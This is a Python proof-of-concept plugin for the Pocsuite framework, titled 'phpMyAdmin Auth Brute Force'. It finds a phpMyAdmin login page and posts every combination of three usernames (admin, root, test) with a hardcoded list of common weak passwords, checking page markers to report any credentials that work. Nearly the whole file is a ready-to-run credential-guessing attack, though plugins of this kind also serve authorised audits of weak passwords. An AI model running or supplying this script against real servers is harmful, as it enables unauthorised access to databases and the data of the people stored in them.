#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : jeffzhang
# @Time    : 18-6-13
# @File    : 180612_phpMyAdmin_all_week_pass.py
# @Desc    : ""

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '0001'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2010-01-01'
    createDate = '2018-06-13'
    updateDate = '2018-06-13'
    references = ['https://www.phpmyadmin.net/']
    name = 'phpMyAdmin Auth Brute Force'
    appPowerLink = 'https://www.phpmyadmin.net/'
    appName = 'phpMyAdmin'
    appVersion = 'all'
    vulType = 'Week Password'
    desc = '''
        Crack phpMyAdmin Password
    '''

    samples = []

    def _attack(self):
        result = {}
        return self.parse_attack(result)

    def _verify(self, verify=True):
        result = {}
        url_list = [self.url]
        flag_list = ['src=\"navigation.php', 'frameborder=\"0\" id=\"frame_content\"', 'id=\"li_server_type\">',
                     'class=\"disableAjax\" title=']
        if "phpmyadmin" not in self.url.lower():
            url_list.append(self.url + "/phpmyadmin/index.php")
        username_list = ['admin', 'root', 'test']
        password_list = ["", '123456789', 'a123456', '123456', 'a123456789', '1234567890', 'woaini1314', 'qwerasdf',
                         'abc123456', '123456a', '123456789a', '147258369', 'zxcvbnm', '987654321', 'qwer!@#$',
                         'abc123', '123456789.', '5201314520', 'q123456', '123456abc', '123123123', '123456.',
                         '0123456789', 'asd123456', 'aa123456', 'q123456789', '!QAZ@WSX', '1qaz2wsx']
        for url in url_list:
            try:
                f_res = req.get(url, timeout=5)
                if "pma_password" in f_res.content and 'phpMyAdmin' in f_res.content:
                    for username in username_list:
                        for password in password_list:
                                payload = {'pma_username': username, 'pma_password': password}
                                headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
                                res = req.post(url, headers=headers, data=payload, timeout=5)
                                for flag in flag_list:
                                    if flag in res.content and res.status_code == 200:
                                        result['VerifyInfo'] = {}
                                        result['VerifyInfo']['url'] = url
                                        result['VerifyInfo']['status_code'] = res.status_code
                                        result['VerifyInfo']['username'] = username
                                        result['VerifyInfo']['password'] = password
                                        result['username'] = username
                                        result['password'] = password
                                        return self.parse_attack(result)
            except Exception as e:
                raise e

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


register(TestPOC)
